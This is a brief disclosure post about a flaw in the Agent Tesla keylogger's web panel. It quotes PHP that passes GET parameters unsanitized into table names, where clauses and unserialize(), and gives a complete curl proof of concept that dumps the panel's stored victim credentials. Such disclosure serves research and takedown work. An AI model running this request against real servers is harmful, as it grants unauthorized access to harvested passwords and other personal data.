Tesla Botnet Information discloser vulnerability
The exploit of the day today is a one year old Vulnerability.
A vulnerability for the popular keylogger Tesla(https://web.archive.org/web/20180614014422/https://www.agenttesla.com/) has been released.
The website(http://www.agenttesla.com/) is currently down, is this due to this vulnerability? Most likely.
The vulnerability lays in the WebPanel/server_side/scripts/server_processing.php PHP file in the web form
Vulnerable Code:
$table = $_GET['table'];
// Table's primary key
$primaryKey = $_GET['primary'];
if(isset($_GET['where'])){
$where = base64_decode($_GET['where']);
}else{
$where = "";
}
$idArray = unserialize(urldecode($_GET['clmns']));
PoC:
curl "http://127.0.0.1/WebPanel/server_side/scripts/server_processing.php?table=passwords&primary=password_id&clmns=a%3A6%3A%7Bi%3A0%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A11%3A%22server_time%22%3Bs%3A2%3A%22dt%22%3Bs%3A11%3A%22server_time%22%3B%7Di%3A1%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A7%3A%22pc_name%22%3Bs%3A2%3A%22dt%22%3Bs%3A7%3A%22pc_name%22%3B%7Di%3A2%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A6%3A%22client%22%3Bs%3A2%3A%22dt%22%3Bs%3A6%3A%22client%22%3B%7Di%3A3%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A4%3A%22host%22%3Bs%3A2%3A%22dt%22%3Bs%3A4%3A%22host%22%3B%7Di%3A4%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A8%3A%22username%22%3Bs%3A2%3A%22dt%22%3Bs%3A8%3A%22username%22%3B%7Di%3A5%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A3%3A%22pwd%22%3Bs%3A2%3A%22dt%22%3Bs%3A3%3A%22pwd%22%3B%7D%7D" -XGET -v
Read more:
https://www.digitrustgroup.com/agent-tesla-keylogger/
